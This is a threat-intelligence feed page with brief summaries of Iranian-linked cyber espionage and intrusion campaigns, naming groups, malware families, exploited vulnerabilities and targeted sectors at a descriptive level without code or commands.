Latest Update30/05/2025

Threats Feed

  1. Public

    Iranian APT Impersonates German Model Agency in Espionage Operation

    Suspected Iranian threat actors, likely linked to APT35 (Agent Serpens), created a fraudulent website impersonating Germany’s Mega Model Agency to conduct targeted espionage. The site collects extensive visitor data—including IP addresses, browser fingerprints, and screen resolutions—using obfuscated JavaScript to enable selective targeting. A fake model profile and inactive album link suggest planned social engineering attacks. Although no victim interaction was confirmed, the infrastructure and tactics indicate preparation for spear phishing. The campaign targets dissidents, journalists, and activists abroad, especially in Germany, aligning with the group’s history of surveillance and influence operations against Iranian opposition figures.

    read more about Iranian APT Impersonates German Model Agency in Espionage Operation
  2. Public

    CyberAv3ngers’ Malware Hits IoT/OT Systems in Fuel and Energy Sectors

    Team82's research details the IOCONTROL malware, a custom-built cyberweapon used by Iran-linked attackers, specifically the CyberAv3ngers group. The malware targets a range of industrial control systems (ICS) and Internet of Things (IoT) devices, notably impacting fuel management systems in Israel and the US. IOCONTROL's functionality includes communication via the MQTT protocol and features such as arbitrary code execution and self-deletion. The analysis reveals the malware's infrastructure, including its command-and-control server and the methods used to evade detection. The report concludes that IOCONTROL represents a significant threat to critical infrastructure, highlighting the ongoing geopolitical conflict.

    read more about CyberAv3ngers’ Malware Hits IoT/OT Systems in Fuel and Energy Sectors
  3. Public

    Fake Assassination News Used in Phishing Attack Impersonating The New York Times

    A phishing campaign is exploiting sensational fake news about an assassination attempt on US President-elect Donald Trump by an Iranian sniper. The campaign poses as The New York Times using the email address newyork-times@nycmail[.]com. Victims who click on the embedded link are redirected to an ESET-imitation phishing site, where they are prompted to enter corporate domain credentials. This campaign is an example of attackers using major global events, such as political elections, to amplify their efforts. The use of urgency and sensational headlines highlights the need for vigilance in verifying information.

    read more about Fake Assassination News Used in Phishing Attack Impersonating The New York Times
  4. Public

    Brute Force and MFA Push Bombing Tactics Used in Iranian Cyber Campaign

    Iranian cyber actors targeted critical infrastructure sectors in the US, Canada, and Australia, including healthcare, government, energy, and IT organisations. The attackers used password spraying and MFA push bombing to obtain valid accounts and access systems such as Microsoft 365, Azure, and Citrix. They used open source tools to gain access to credentials, including Kerberos SPN enumeration and Active Directory dumps. In some cases, the attackers attempted to exploit the Netlogon vulnerability for privilege escalation. In addition, the actors used discovery techniques using living-off-the-land tools to identify domain controllers, trusted domains and administrative accounts.

    read more about Brute Force and MFA Push Bombing Tactics Used in Iranian Cyber Campaign
  5. Public

    UNC1860 Targets Middle Eastern Networks with Specialized Tooling

    UNC1860, an Iranian state-sponsored group likely affiliated with the Ministry of Intelligence and Security (MOIS), targets government and telecommunications sectors in the Middle East, particularly in Saudi Arabia, Qatar, and Israel. The group acts as an initial access provider, exploiting vulnerabilities in internet-facing servers and deploying web shells like STAYSHANTE. Custom tools, such as TEMPLEPLAY and VIROGREEN, allow for remote access and further exploitation. UNC1860's operations are characterised by passive backdoors, credential validation, and stealthy malware that facilitates long-term persistence and hand-off to other threat actors. It's likely that the group has supported disruptive campaigns in the region.

    read more about UNC1860 Targets Middle Eastern Networks with Specialized Tooling
  6. Public

    Malware Masquerading as Palo Alto GlobalProtect Targets Middle Eastern Organizations

    Threat actors are targeting users in the Middle East with malware disguised as the Palo Alto GlobalProtect VPN tool. Delivered likely through phishing, the malware employs a two-stage infection chain initiated via a malicious setup.exe. It uses advanced command-and-control (C2) infrastructure, including newly registered domains like “sharjahconnect” and the Interactsh project for beaconing. Written in C#, the malware supports remote PowerShell execution, file download/exfiltration, and AES-encrypted communications. It also features sandbox evasion, system information gathering, and beaconing mechanisms to track infection stages. This campaign highlights significant threats to organizations in the region, particularly those reliant on VPN-based remote access.

    read more about Malware Masquerading as Palo Alto GlobalProtect Targets Middle Eastern Organizations
  7. Public

    Peach Sandstorm Targets US and UAE Critical Sectors with Tickler Malware

    Between April and July 2024, Iranian state-sponsored group Peach Sandstorm deployed a custom backdoor called Tickler in intelligence-gathering operations against satellite, communications, oil and gas, and government sectors in the US and UAE. Their tactics included password spray attacks and LinkedIn-based social engineering. Tickler malware leveraged Azure infrastructure for command-and-control (C2) and utilized DLL files for persistence. Peach Sandstorm also accessed compromised Active Directory accounts to further exploit targeted environments. Their evolving tradecraft demonstrates a persistent focus on the intelligence sector, including higher education, government, and defense.

    read more about Peach Sandstorm Targets US and UAE Critical Sectors with Tickler Malware
  8. Public

    Iran-Based Hackers Target U.S. Sectors, Collaborate with Ransomware Affiliates

    Iran-based cyber actors linked to the Iranian government are exploiting organisations across multiple sectors in the US, including education, finance, healthcare, defence, and local government, as well as targets in Israel, Azerbaijan, and the UAE. Since 2017, these actors have focused on gaining and monetising network access, working with ransomware affiliates such as NoEscape, Ransomhouse, and ALPHV (BlackCat). They exploit vulnerabilities in internet-facing services such as Check Point, Palo Alto Networks and Citrix. They also use tools such as AnyDesk, PowerShell, Ligolo and NGROK for persistence and command and control.

    read more about Iran-Based Hackers Target U.S. Sectors, Collaborate with Ransomware Affiliates
  9. Public

    Iran's Cyber Operations Target 2024 US Presidential Election

    It has been established that Iranian threat actors have initiated cyber-enabled influence operations targeting the 2024 US presidential election. Groups such as Sefid Flood are impersonating social and political activist groups with the intention of undermining trust in authorities and sowing discord. Iran's Islamic Revolutionary Guard Corps (IRGC)-linked Mint Sandstorm has been observed conducting spear-phishing campaigns against US presidential campaigns, while Peach Sandstorm has been engaged in password spray attacks on local government accounts. Additionally, the Iranian network Storm-2035 has been identified as operating covert news websites with the objective of polarising US voters. These operations represent part of a broader effort by Iran to interfere with elections in the US and other countries like Bahrain and Israel, often targeting political and government sectors.

    read more about Iran's Cyber Operations Target 2024 US Presidential Election
  10. Public

    Handala Hack Intensifies Cyberattacks on Israeli Critical Infrastructure

    Handala has been targeting Israeli critical infrastructure and entities since December 2023. Their activities include phishing campaigns, ransomware attacks, and website defacements, often releasing partial evidence of success to bolster their reputation. Notable incidents include attacks on Israel's Iron Dome radar systems, a ransomware assault on Ma’agan Michael Kibbutz, and an alleged data breach of Zerto, a Hewlett Packard Enterprise subsidiary. The group utilizes sophisticated methods, including phishing links and attachments, to compromise and exfiltrate sensitive data. Handala is considered a serious cyber threat, primarily targeting Israel's critical sectors.

    read more about Handala Hack Intensifies Cyberattacks on Israeli Critical Infrastructure
  11. Public

    Peach Sandstorm’s Multi-Faceted Attacks on Satellite, Defense, and Pharma Sectors

    Peach Sandstorm, an Iranian threat actor, has conducted password spray attacks since February 2023 against global organizations, notably in the satellite, defense, and pharmaceutical sectors. These attacks originated from TOR IPs and employed a mix of public and custom tools like AzureHound and Roadtools for reconnaissance. Once inside the network, the group established persistence through mechanisms like Azure subscriptions and Azure Arc. They also attempted to exploit vulnerabilities in Zoho ManageEngine and Confluence. Some instances involved data exfiltration and lateral movement using techniques like Golden SAML and remote desktop protocol (RDP).

    read more about Peach Sandstorm’s Multi-Faceted Attacks on Satellite, Defense, and Pharma Sectors
  12. Public

    Iranian APT33 Intensifies Attacks on Multiple Sectors Worldwide

    APT33, an Iranian threat group active since 2013, targets multiple countries and sectors, primarily focusing on Saudi Arabia and the United States. The group employs spear phishing with malicious attachments and links, watering hole attacks, and uses both custom and commodity malware, including the Shamoon data-wiper. They exploit known vulnerabilities and leverage stolen credentials to gain access. Key targets include government, aerospace, petrochemical, engineering, finance, and telecom industries. APT33’s infrastructure includes domain masquerading and compromised servers. Recent activities include targeting cloud infrastructure and using spoofed domains to distribute malware.

    read more about Iranian APT33 Intensifies Attacks on Multiple Sectors Worldwide
  13. Public

    Iranian-backed APTs Target Aeronautical Sector: A Multi-Vector Attack

    The Cybersecurity and Infrastructure Security Agency (CISA), FBI, and Cyber National Mission Force (CNMF) identified multiple APT actors exploiting vulnerabilities in an Aeronautical Sector organization as early as January 2023. The actors targeted a public-facing application (Zoho ManageEngine ServiceDesk Plus) and the organization’s firewall device, exploiting CVE-2022-47966 and CVE-2022-42475. They gained unauthorized access, established persistence, moved laterally, and engaged in defense evasion by deleting logs. Although the attackers achieved extensive network enumeration and credential access, the report didn't confirm any data exfiltration.

    read more about Iranian-backed APTs Target Aeronautical Sector: A Multi-Vector Attack
  14. Public

    Iranian APTs Exploit Log4Shell to Compromise FCEB Network

    In April 2022, CISA detected Iranian government-sponsored APT activity compromising an FCEB organization's network via the Log4Shell vulnerability. Initial exploitation targeted an unpatched VMware Horizon server, later spreading to the domain controller. The threat actors utilized PowerShell commands, disabled Windows Defender, and established persistence through scheduled tasks. Tools like Mimikatz and Ngrok were deployed for credential harvesting and C2 communication. Despite attempts to dump the LSASS process, additional anti-virus measures thwarted this activity. Lateral movement was observed, as were activities aimed at credential and account manipulation.

    read more about Iranian APTs Exploit Log4Shell to Compromise FCEB Network
  15. Public

    Iranian State-Sponsored Actors Exploit Log4Shell to Target US Government

    In April 2022, Iranian government-sponsored actors exploited the Log4Shell vulnerability in VMware Horizon servers, targeting a Federal Civilian Executive Branch (FCEB) organization. They installed XMRig crypto mining malware and used tools like Mimikatz and Ngrok for credential theft and tunneling. The attack involved disabling Windows Defender, downloading malicious files, hiding artifacts, and creating scheduled tasks for persistence. The campaign highlights advanced tactics in disabling security controls and maintaining persistent access. The targeted sector was the US government.

    read more about Iranian State-Sponsored Actors Exploit Log4Shell to Target US Government
  16. Public

    Sophisticated PowerShell Attack Targets Systems with Spearphishing

    The Fully Undetectable (FUD) PowerShell backdoor report details a sophisticated attack beginning with a malicious Word document ("Apply Form.docm") used in a LinkedIn-based spearphishing campaign originating from Jordan. The document contains a macro that launches a PowerShell script, creating a scheduled task to execute further malicious actions. The backdoor communicates with its C2 server, executing various commands such as process list exfiltration, user enumeration, and Active Directory exploration. SafeBreach identified operational security mistakes allowing decryption of the C2 commands. The campaign, involving PowerShell scripts and scheduled tasks, targets systems for data exfiltration and potential lateral movement.

    read more about Sophisticated PowerShell Attack Targets Systems with Spearphishing
  17. Public

    CodeRAT Targets Farsi-Speaking Developers with Innovative C2 Techniques

    SafeBreach Labs has discovered CodeRAT, a new remote access trojan (RAT) targeting Farsi-speaking software developers with capabilities ranging from espionage to data exfiltration. Delivered via a Word document that exploits Microsoft DDE, CodeRAT monitors activity in various applications, particularly those related to social networking and development tools. Uniquely, it uses public file upload APIs and Telegram groups for command and control, bypassing typical C2 infrastructure. The malware supports 50 commands, including clipboard capture, process control and file upload. The CodeRAT developer released the source code on GitHub after it was discovered by researchers.

    read more about CodeRAT Targets Farsi-Speaking Developers with Innovative C2 Techniques
  18. Public

    Iranian Lyceum Group Deploys Malware Disguised as Adobe Update

    The Iranian SiameseKitten (Lyceum) group deployed new malware masquerading as an Adobe update, communicating with a command and control server. The malware includes a reverse shell and employs fake Microsoft certificates, echoing tactics seen with other Iranian groups like Phosphorus. The attack involved a lure PDF related to drone attacks in Iran, aiming to establish persistence via the Startup folder. The parent file and reverse shell were downloaded from domains registered on June 6th, highlighting the group's continued use of sophisticated detection avoidance techniques.

    read more about Iranian Lyceum Group Deploys Malware Disguised as Adobe Update
  19. Public

    Iranian-Linked POLONIUM Targets Israeli Manufacturing and Defense Industries

    POLONIUM, suspected to be coordinating with Iran's Ministry of Intelligence and Security, is actively targeting Israeli organizations across multiple sectors such as critical manufacturing, IT, and defense. The group exploits supply chain vulnerabilities by compromising IT companies to further target downstream organizations like aviation companies and law firms. TTPs include custom implants like CreepyDrive that use cloud services for C2 and data exfiltration. MSTIC also notes overlap with Iranian groups MERCURY, CopyKittens, both in targeted victims and techniques like using AirVPN and OneDrive. Though unconfirmed, around 80% of victims were observed running Fortinet appliances, suggesting a potential CVE-2018-13379 exploitation.

    read more about Iranian-Linked POLONIUM Targets Israeli Manufacturing and Defense Industries
  20. Public

    StrifeWater: Unmasking the New RAT Deployed by Iranian APT Moses Staff

    The Iranian APT group Moses Staff deployed a new, previously undocumented Remote Access Trojan (RAT) called StrifeWater for its cyber-espionage and disruption operations. The StrifeWater RAT has been used in initial attack stages, demonstrating various capabilities like listing system files, executing system commands, creating persistence, and downloading updates. Post-infection, it's replaced with ransomware not for financial gain but to disrupt operations and inflict system damage. Victims of these attacks span globally across countries like Israel, Italy, India, Germany, Chile, Turkey, UAE, and the US.

    read more about StrifeWater: Unmasking the New RAT Deployed by Iranian APT Moses Staff
  21. Public

    Iranian Threat Actor Exploits MSHTML Vulnerability to Target Farsi Speakers

    SafeBreach Labs discovered an Iranian threat actor exploiting the MSHTML vulnerability (CVE-2021-40444) to infect Farsi-speaking victims with the PowerShortShell stealer via spear phishing. The attack, first reported in September 2021, involved a malicious Word document connecting to a server, downloading a DLL, and executing a PowerShell script. This script collected data, including screenshots and files, and exfiltrated it to the attacker's server. The campaign targeted Iranians abroad, particularly in the United States, suggesting ties to Iran's Islamic regime.

    read more about Iranian Threat Actor Exploits MSHTML Vulnerability to Target Farsi Speakers
  22. Public

    Iranian APT Group Exploits Microsoft and Fortinet Vulnerabilities: A Broad Spectrum Cyber Assault

    Some Iranian government-sponsored APT groups have exploited vulnerabilities in Microsoft Exchange servers and Fortinet devices since March 2021. These actors broadly targeted critical infrastructure sectors in the US, including Transportation and Healthcare and Public Health, as well as Australian organizations. The APT group focused more on exploiting known vulnerabilities rather than specific sectors, using the gained access for ransomware deployment, data exfiltration, and extortion. Several tactics, techniques, and tools were utilized, including creating new user accounts and modifying Task Scheduler.

    read more about Iranian APT Group Exploits Microsoft and Fortinet Vulnerabilities: A Broad Spectrum Cyber Assault
  23. Public

    Lyceum Intensifies Cyber Espionage on Tunisian Telecom and Aviation Sectors

    The Lyceum group (also known as Hexane) is a cyber threat actor focused on the telecommunications, energy and aviation sectors, particularly targeting high-profile organisations in Tunisia. Active since 2018, Lyceum has recently replaced its .NET-based malware with new C++ backdoors and PowerShell scripts to evade detection. The group continues to rely on DNS tunneling for command and control (C2) and uses tools for system reconnaissance, credential theft and keylogging. Lyceum also uses spoofed domains to disguise its activities, demonstrating an adaptive approach to persistent targeting of critical infrastructure.

    read more about Lyceum Intensifies Cyber Espionage on Tunisian Telecom and Aviation Sectors
  24. Public

    MalKamak Targets Middle Eastern Aerospace and Telecom Firms with ShellClient RAT

    The Iranian APT group MalKamak has been targeting aerospace and telecommunications companies in the Middle East since at least 2018, with additional victims in the US, Russia and Europe. The group uses ShellClient, a newly discovered remote access trojan (RAT), to conduct highly targeted cyberattacks. ShellClient uses Dropbox, a popular cloud-based service, for command and control (C2) operations, replacing the group's previous C2 infrastructure.

    read more about MalKamak Targets Middle Eastern Aerospace and Telecom Firms with ShellClient RAT